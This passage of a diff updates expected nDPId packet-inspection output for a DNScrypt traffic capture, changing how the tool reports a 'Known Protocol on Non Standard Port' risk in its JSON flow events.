 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":946739396218,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"ts_msec":946739396218,"pkt":"ZmZmZmZmRERERERECABFAADcvzkAADQRYU9rqjkiCgAAAQG7pJ0AyPvgszCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAAI\/a1gzqXBRkeMMNLdByUsrCAeXq9pAoSIZvWZO078wHKN5t9zokYno4cH1X8DUwDBTmKYZNXI496f2ZPTyfGw7EiDsrhQ4a28OXE48fibQ4VcAHxN0Yn+p8BQ7Bz9i\/KcWIOyuFDhrbX1Oowl9TqMJfVPpC"}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01138{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAIcPTRAAH4RwyoKAAABucF\/9N6cAbsCCPyL\/I8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAIc9\/NAAH4RCGsKAAABucF\/9MOOAbsCCPyL\/IsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01138{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAIcPTVAAH4RwykKAAABucF\/9OfaAbsCCPyL\/I0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAXcPTYgAH4R32gKAAABucF\/9NaIAbsGBKQ8\/IwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":546,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAABQPTYAuX4RBDwKAAABucF\/9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":546,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAXcPTggAH4R32YKAAABucF\/9LTqAbsGBMXY\/I4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":46314,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400460,"flow_last_seen":946739400460,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739400460,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":946739400460,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739400460,"pkt":"REREREREZmZmZmZmCABFAAXcPTcgAH4R32cKAAABucF\/9LtjAbsGBL9j\/IoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAl5b2Zpamktc2UAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA